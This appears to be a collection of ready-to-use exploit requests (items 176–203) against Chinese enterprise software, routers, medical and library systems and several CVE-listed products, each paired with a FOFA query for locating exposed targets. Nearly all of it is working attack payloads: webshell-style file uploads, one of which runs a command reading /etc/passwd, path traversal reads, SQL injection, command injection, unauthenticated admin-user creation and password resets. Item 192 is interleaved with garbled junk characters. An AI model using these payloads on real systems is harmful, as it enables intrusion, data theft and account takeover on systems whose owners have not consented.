User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

176. Telecom gateway configuration management system rewrite.php file upload
FOFA:body="img/login_bg3.png" && body="系统登录"
POST /manager/teletext/material/rewrite.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
Connection: close

------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="tmp_name"; filename="test.php"
Content-Type: image/png

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="uploadtime"

------WebKitFormBoundaryOKldnDPT--

177. H3C router sensitive information disclosure
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../M60.cfg
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3200.cfg
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3100.cfg
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg

178. H3C campus network self-service system flexFileUpload arbitrary file upload
FOFA:header="/selfservice"
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Content-Length: 252
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l

-----------------aqutkea7vvanpqy3rh2l
Content-Disposition: form-data; name="12234.txt"; filename="12234"
Content-Type: application/octet-stream
Content-Length: 255

12234
-----------------aqutkea7vvanpqy3rh2l--

GET /imc/primepush/%2e%2e/flex/12234.txt

179. 建文 engineering management system arbitrary file read
POST /Common/DownLoad2.aspx HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

path=../log4net.config&Name=

180. 帮管客 CRM jiliyu SQL injection
FOFA:app="帮管客-CRM"
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

181. 润申信息科技 enterprise standardization management system UpdataLogHandler.ashx SQL injection
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20

182. 润申科技 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

username=test1234&pwd=test1234&savedays=1

183. 广州图创 library cluster management system updOpuserPw SQL injection
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

184. 迅饶科技 X2Modbus gateway AddUser arbitrary user addition
FOFA:server="SunFull-Webs"
POST /soap/AddUser HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: application/xml, text/xml, */*; q=0.01
Content-Type: text/xml; charset=utf-8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
X-Requested-With: XMLHttpRequest

insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')

185. 瑞友天翼 application virtualization system SQL injection
version < 7.0.5.1
FOFA:app="REALOR-天翼应用虚拟化系统"
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
Host: host

186. F-logic DataCube3 SQL injection
CVE-2024-31750
F-logic DataCube3 is a compact terminal measurement system for photovoltaic power generation systems.
FOFA:title=="DataCube3"
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded

req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450

187. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Mura CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1

188. 叁体-佳会 video conferencing attachment arbitrary file read
version <= 3.9.7
FOFA:body="/system/get_rtc_user_defined_info?site_id"
GET /attachment?file=/etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

189. 蓝网科技 clinical viewer system deleteStudy SQL injection
FOFA:app="LANWON-临床浏览系统"
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

190. Short video matrix marketing system poihuoqu arbitrary file read
FOFA:title=="短视频矩阵营销系统"
POST /index.php/admin/Userinfo/poihuoqu HTTP/2
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

poi=file:///etc/passwd

191. 亿赛通 electronic document security management system NavigationAjax SQL injection
FOFA:body="/CDGServer3/index.jsp"
POST /CDGServer3/js/../NavigationAjax HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=

$ J1 y- I# l& o4 F$ I1 a: T192. 富通天下外贸ERP UploadEmailAttr 任意文件上传
# C1 E; P6 F! d' J0 @: u" MFOFA:title="用户登录_富通天下外贸ERP"9 d" E8 J; W1 |
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
' r3 u# |) Y" b% FHost: your-ip
, v9 N* }6 k9 N \. q4 TUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
% D: q: t2 `, G5 p+ o, xContent-Type: application/x-www-form-urlencoded3 {0 {6 d7 G* e* f; z9 k
5 n9 W2 D& E. J8 j
$ k: d7 ~+ ?+ c& ^9 d/ ?, G9 U<% @ webhandler language="C#" class="AverageHandler" %># l) d7 w3 ?6 ?1 P v
using System;5 f1 D/ |; \/ B
using System.Web;$ {- T2 j# k2 {6 P# x6 [
public class AverageHandler : IHttpHandler
. D9 l" t# d) u; f1 X' R1 G{
, ?. J' d0 G4 _+ `# s- ~public bool IsReusable
+ C7 ^" T6 ]1 j4 W- i{ get { return true; } }- i% \" {$ |! r2 `
public void ProcessRequest(HttpContext ctx)$ l# s8 P& C! v
{
$ v0 R+ U, V4 k8 L# ^ctx.Response.Write("test");4 s$ Y9 [# K2 ^* O c. S
}
( f3 O- b% l' _2 X; f K}/ g6 u" Z. r4 v& _+ \( O
- b, ~, s% W2 N) A5 { V
193. 山石网科云鉴安全管理系统 setsystemtimeaction command execution
FOFA:body="山石云鉴主机安全管理系统"
GET /master/ajaxActions/getTokenAction.php HTTP/1.1
Host:
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
Host:
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
Content-Length: 84

param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')

GET /master/img/config HTTP/1.1
Host:
User-Agent: Mozilla/5.0

194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet arbitrary file upload
FOFA:app="FE-协作平台"
If a request to /servlet/uploadAttachmentServlet returns a response, the vulnerability is present.
POST /servlet/uploadAttachmentServlet HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk

------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
Content-Type: text/plain

<% out.println("hello");%>
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="json"

{"iq":{"query":{"UpdateType":"mail"}}}
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--

195. 飞鱼星上网行为管理系统 send_order.cgi command execution
FOFA:title=="飞鱼星企业级智能上网行为管理系统"
POST /send_order.cgi?parameter=operation HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 68

{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}

196. 河南省风速科技统一认证平台 password reset
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 45
Connection: close

{"xgh":"test","newPass":"test666","email":""}

197. 浙大恩特客户资源管理系统 Quotegask_editAction SQL injection
FOFA:app="浙大恩特客户资源管理系统"
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
Accept-Encoding: gzip, deflate
Connection: close

198. 阿里云盘 WebDAV command injection
CVE-2024-29640
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close

199. cockpit assetsmanager_upload interface file upload
1. Run the POC to fetch the CSRF value and obtain the cookie, then upload and access the result:
GET /auth/login?to=/ HTTP/1.1

Response: 200, returned value: csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"
2. Use the JWT obtained in the previous step to get the cookie:

POST /auth/check HTTP/1.1
Content-Type: application/json

{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}

Response: 200, returned value:
Set-Cookie: mysession=95524f01e238bf51bb60d77ede3bea92; path=/
Fofa:title="Authenticate Please!"
POST /assetsmanager/upload HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92

-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="files[]"; filename="tttt.php"
Content-Type: text/php

<?php echo "tttt";unlink(__FILE__);?>
-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="folder"

-----------------------------36D28FBc36bd6feE7Fb3--

/storage/uploads/tttt.php

200. SeaCMS海洋影视管理系统 dmku SQL injection
FOFA:app="海洋CMS"
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

201. 方正全媒体新闻采编系统 binary SQL injection
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
POST /newsedit/newsplan/task/binary.do HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1

202. 微擎系统 AccountEdit arbitrary file upload
FOFA:body="/Widgets/WidgetCollection/"
Obtain the __VIEWSTATE and __EVENTVALIDATION values:
GET /User/AccountEdit.aspx HTTP/1.1
Host: 滑板人之家
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
Content-Length: 0

Replace the __VIEWSTATE and __EVENTVALIDATION values with those obtained above:
POST /User/AccountEdit.aspx HTTP/1.1
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687

-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__VIEWSTATE"

__VIEWSTATE
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__EVENTVALIDATION"

__EVENTVALIDATION
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
Content-Type: text/plain

Hello World!
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"

上传图片
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"


-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"


-----------------------------786435874t38587593865736587346567358735687--

/_data/Uploads/1123.txt

203. 红海云EHR PtFjk file upload
FOFA:body="RedseaPlatform"
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
Host: x.x.x.x
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Length: 210

------WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
Content-Type:image/jpeg

<% out.print("hello,eHR");%>
------WebKitFormBoundaryt7WbDl1tXogoZys4--